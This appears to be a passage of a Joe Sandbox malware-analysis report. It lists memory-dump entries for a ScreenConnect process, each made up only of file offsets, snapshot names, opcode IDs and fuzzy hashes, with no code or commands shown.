                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: 6
• API String ID: 0-922970802
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: /
• API String ID: 0-85052098
                                                                                                                                                                                                                                                          • Opcode ID: 770aba3e8346e79151b00bfd449edcc63dfbfafed6940dae0e5ded9f191f70aa
                                                                                                                                                                                                                                                          • Instruction ID: 9b091eeb163b10152df868511945386ee22b3ac040e3518594ef4cf1927852f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 770aba3e8346e79151b00bfd449edcc63dfbfafed6940dae0e5ded9f191f70aa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92413A71A1C6594FE758EA288411278B3D2FF95742F144279E4CAC76E6EF28F8028781
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 185fb10091dc16ba9201fa207e8fee120f861869762ecceb369d3b7ba28c875b
                                                                                                                                                                                                                                                          • Instruction ID: f1903fcf4a754aaac622341af7168f0ee1a6ce0a55b9c2b644613d2018933a6a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 185fb10091dc16ba9201fa207e8fee120f861869762ecceb369d3b7ba28c875b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6912EE21E1CA8A4FEB98EA2899556F973E2FF54341F4400BAD40EC72D3DF28B846C745
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c082b24ec5f79668d7fe4b8099c0efd8892ce7c73a68a1565e418cc6a2bc5fa
                                                                                                                                                                                                                                                          • Instruction ID: 0f3469b86786f7e6459a02f8ae958d9f100151aae6c9f32cec2510d4b2b3819e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c082b24ec5f79668d7fe4b8099c0efd8892ce7c73a68a1565e418cc6a2bc5fa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DC144A1E4DACA4FE796EA3868151F47BE1FF55681F1802BAC449C71D7EF18B806C341
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5d1cec2f23b930b46d0a723999895e3ef21bb7777c61d4a23cbfe926dfa9ff2d
                                                                                                                                                                                                                                                          • Instruction ID: 7df48200cc2a31b91882982836dccd24ba6c19d56e82c7a578f03a5b00525b25
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d1cec2f23b930b46d0a723999895e3ef21bb7777c61d4a23cbfe926dfa9ff2d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B11432D8CA8B5FEB59EA2898524F537D1FF55791F04017AD48E87183EF18B84AC389
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ec540d06869222d254db90d3f7c6cd1f7e5d4b328034fb78661e06fb23618c4b
                                                                                                                                                                                                                                                          • Instruction ID: 259f3fdb74d839aad173b411f2525ce9479921ec3395fe4b7a0ea794475da718
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec540d06869222d254db90d3f7c6cd1f7e5d4b328034fb78661e06fb23618c4b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7981B03298CA0B9BEB58EA18C4528F973E1FF54391F50413DD49E83582DF28F95AC789
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5b589c75d179e18d868838f31851c425c8007d02dc2c2ac74ddad69c2a746e15
                                                                                                                                                                                                                                                          • Instruction ID: 9681cb3a814af0382f49e88d9b356cfce8b18e87ca8ef7c78e9c693f38149558
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b589c75d179e18d868838f31851c425c8007d02dc2c2ac74ddad69c2a746e15
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8819071A08A4E8FDF98EF28C490AE937A1FF59305F1406A9D41EC72D6CB35E842CB41
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2b3e8a0cbb5597de6f5e640845e6cb11a53c9a0a20aaccfa61664e5c53becb8f
                                                                                                                                                                                                                                                          • Instruction ID: 88556eafaba79e65c0ba3a83f45f642787b8504b7c898ad5730142d8f2e8697d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b3e8a0cbb5597de6f5e640845e6cb11a53c9a0a20aaccfa61664e5c53becb8f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D61CF30A0C9894FE758EB288454ABA77E1FF98351F1401BEE04DC72D3CF29A802C785
Memory Dump Source
• Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f20c6ac9fffba03d7ef0e7d9ba692e8e0cedbabc80d43722213b5c9e90d6f41c
                                                                                                                                                                                                                                                          • Instruction ID: 499d4454807ccd73069e773a58cb70033edcdad2c90f9cb76688588b6bc56bb6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20c6ac9fffba03d7ef0e7d9ba692e8e0cedbabc80d43722213b5c9e90d6f41c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C951B1B1E1CA8E4FEBA5DB6898642B87BE1FF59241F180079D44DC32D2EF28AC45C305
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9b6a12fdceaf071a7c3e066692b7eb6f1a6cd1aa00c1ee34b8923ddeab0c2dba
                                                                                                                                                                                                                                                          • Instruction ID: 16f486e359595c6e374b0eadf4389a94ae55820aaa23425b96c13dd3d0166acf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b6a12fdceaf071a7c3e066692b7eb6f1a6cd1aa00c1ee34b8923ddeab0c2dba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51B172A0CA4A8FEB88EE28D451AA533E1FF58750F1400B9D44ECB296DF35F846C784
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e00f3ce3707d1a77db56056c4d17816fe825200baf4167b8f2871fce7aaedaf4
                                                                                                                                                                                                                                                          • Instruction ID: 01a172fbda240329dc1fe49c4b1e1e12bfcf8018e1ed2b26bdd3d905aa555ba3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e00f3ce3707d1a77db56056c4d17816fe825200baf4167b8f2871fce7aaedaf4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B41D271E1DA8A8FEBC9EB2898556A97BE1FF59340F0801A9D05DC72E7DF24AC01C744
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6f656139364bafcec4e8f4c857c7af9d83dbb07616e5bdbda6b77fe92efdfb33
                                                                                                                                                                                                                                                          • Instruction ID: 01946415be7f0e1bb9f98fdb08600cd979b897d5558bdb5a89f6471c9d3c1ef0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f656139364bafcec4e8f4c857c7af9d83dbb07616e5bdbda6b77fe92efdfb33
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35419D60A1CA494FE798EA3884697F6B7D1FB99395F0445B9D04DC36D2CF2CBC428741
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a4bfdf18be94b2c1ae99a33332f0207a5020c61809f3ab52321d574ba120f472
                                                                                                                                                                                                                                                          • Instruction ID: 5a782b09d0f7189cf6034f804ac77972e85f5761fe4536bef2ab81227aa54f6c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4bfdf18be94b2c1ae99a33332f0207a5020c61809f3ab52321d574ba120f472
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41737161CA898FDB89DF28C8A4AA537E1FF99314F1402ADD45DC72D6CB35E812CB01
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 126912903054c405d4dbd616e1c6167032b24a6d2800f98c59af969b8bee53d4
                                                                                                                                                                                                                                                          • Instruction ID: 202a77bedfdc22249a5cd33846faec4308645ecc9630bde7bfaec794ee28c949
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 126912903054c405d4dbd616e1c6167032b24a6d2800f98c59af969b8bee53d4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8419971A4CA899FDB89DF28C8A4AA537E1FF58314F5401ADD46EC72D6CB35E852CB00
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 56db7fb578361475ac9434f9a72986e786b0c6a9521462fa6947c06447043836
                                                                                                                                                                                                                                                          • Instruction ID: 9af02a65d33cfe559a05d72e072500afa721321c9e1722c4fdf19d5b69ae2cf3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56db7fb578361475ac9434f9a72986e786b0c6a9521462fa6947c06447043836
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841F0B2E0C94E8FEB69EA68B8510EC77E1FF94746F18027AD41DC3196DF246806C744
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 43add0756baa53ae6ab9b75d365066dd56c5f4d74fb4eb04e5370148c3ea0a79
                                                                                                                                                                                                                                                          • Instruction ID: 06199f28a0009a4b6184ba442850704bba0330043e4eefffd38b4ab04b513910
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43add0756baa53ae6ab9b75d365066dd56c5f4d74fb4eb04e5370148c3ea0a79
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03313722E1CA950FE769BA2868461F977D0FBA9660F0401BFE44DC3297DE187C46C3C6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 54b39423c51191d2f639ee8d3ee8d10e2c1ee804d2b356dc7d8a52e8ae3f39f2
                                                                                                                                                                                                                                                          • Instruction ID: 344c5ecfe0f1f89f67dc216bce839302a806133f4b235b8bad238476b393e0f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54b39423c51191d2f639ee8d3ee8d10e2c1ee804d2b356dc7d8a52e8ae3f39f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA31B072E1CD8A8FEAC8DB2C98516A837D2FF99754F1801A8D05DC32D6DF24AC02C744
Memory Dump Source
• Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d1fd58f08e46380d7f1fdee15fa24b5cfe7f55e55fd140d9fed467254595e89b
                                                                                                                                                                                                                                                          • Instruction ID: 0fab8f0582ed4b8707c8649983a7ea8b4bcefe034259ba82d485637d79dc285a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1fd58f08e46380d7f1fdee15fa24b5cfe7f55e55fd140d9fed467254595e89b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0318D2294E3D55FD702AB68D8A55D53FA0EF47268B0901E3D098CF0A3CA19584AC762
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4ba9117ab07305d76f287e2e5b0819d898686df1467ff53e53ccc537d53d733e
                                                                                                                                                                                                                                                          • Instruction ID: ae0186244ee6a21f05fa149687a84687af5de7ec75323b62bb1a379a194a43fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ba9117ab07305d76f287e2e5b0819d898686df1467ff53e53ccc537d53d733e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21377190DA894FD795EB35A8501E97BE1FF85364F0402BBD48DC3192DB28B806C752
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 03f5752bcd6e61e3abcca027bf074bd7ace63e93f7c472008c7ff2a111c47cf3
                                                                                                                                                                                                                                                          • Instruction ID: a5b428265f1ce13fecc1556262956951faf7efaa0b94e0886e8775d182330ee3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03f5752bcd6e61e3abcca027bf074bd7ace63e93f7c472008c7ff2a111c47cf3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07218D2184E68A4FD756DBA088256E9BBE0FF52251F0901FBC099CB5A3CB5C6C45C762
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5a999a1b070248a6c67a9f56159be8f20743c3a03fab9cb572111f2d57c55c98
                                                                                                                                                                                                                                                          • Instruction ID: e7d759aaadb8c09eaf4cc28d921b9f37592a2c2c2f9bf172bd12197115e448f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a999a1b070248a6c67a9f56159be8f20743c3a03fab9cb572111f2d57c55c98
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3214B31908B894FD755EE28D8455E53BD1FF593A1F14017BD40DCB252DF35A946C380
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fb8a634ad00354b17536a979b7cdca2537757d130c09a240081f036a98445692
                                                                                                                                                                                                                                                          • Instruction ID: d7ddb8a971a5d70ff93f6f7a07133148ead910096b1cdb7c122ede3025c77686
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb8a634ad00354b17536a979b7cdca2537757d130c09a240081f036a98445692
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31BF75A08A8A9FD389DB28C865AF977E2FF98354F0445B9D45DC7392CB28B801C780
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8286d1cb054ee81c95d54e3bb15d5b6e4dca3a80ce687a0bfb40caa00592da3c
                                                                                                                                                                                                                                                          • Instruction ID: 05529536e20f98ea9b047340fd3cee13926837f7e1a210bfa243a9a0b5809806
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8286d1cb054ee81c95d54e3bb15d5b6e4dca3a80ce687a0bfb40caa00592da3c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F212161E0CA865FE794EA7C64952F57BE1FF99251F1801BBC008C718BDF18A846C381
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3fa19a8b22f3b6a06a4ceb7fb345f4bc78e420ea7a611acd17c1045f79e21a4b
                                                                                                                                                                                                                                                          • Instruction ID: 4ed3581472ab5907e6f273a619b375a91840e266306d524e18a3015f187c6307
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa19a8b22f3b6a06a4ceb7fb345f4bc78e420ea7a611acd17c1045f79e21a4b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311DA21E1CA955FD668A9285C5A6F977D1FBA8751F04007FE44DC3293DE287C0683C6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 569caf0f4f7bd21c173e1c6b682f41115fbffd1ed0aae83411e980d410e68329
                                                                                                                                                                                                                                                          • Instruction ID: 0bcb1e56b01a5b0214a9ab1e2b772110e7ad615c618e097c3214832d120b3cf1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 569caf0f4f7bd21c173e1c6b682f41115fbffd1ed0aae83411e980d410e68329
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB11C12190EBD84FE3A6CA3814610A57FE0FF86255F0806EFE4D9CB1E3CA196C05D341
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cc9b1b4d7b35be9f7d6dad8af50e86016ecae02e3714b7a226b1a2b9c33205bb
                                                                                                                                                                                                                                                          • Instruction ID: 16e74f3f604799692392e4de3ce5788754921e7ddc6be06ff900bcbed5b8bee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc9b1b4d7b35be9f7d6dad8af50e86016ecae02e3714b7a226b1a2b9c33205bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5101573160DB02CBD35DEA28A0415BAB3E1FF85352F50087DE05A822C6CF3AF846CB49
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ce472549a2639d06dd1cfeaee44227e807a8690e8570bfedc2c3a2e6adea2ab0
                                                                                                                                                                                                                                                          • Instruction ID: b71c62cf1ea66ad3249a6cec5bb42f7f7c1ba576e49de58b5f9f6e98837726d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce472549a2639d06dd1cfeaee44227e807a8690e8570bfedc2c3a2e6adea2ab0
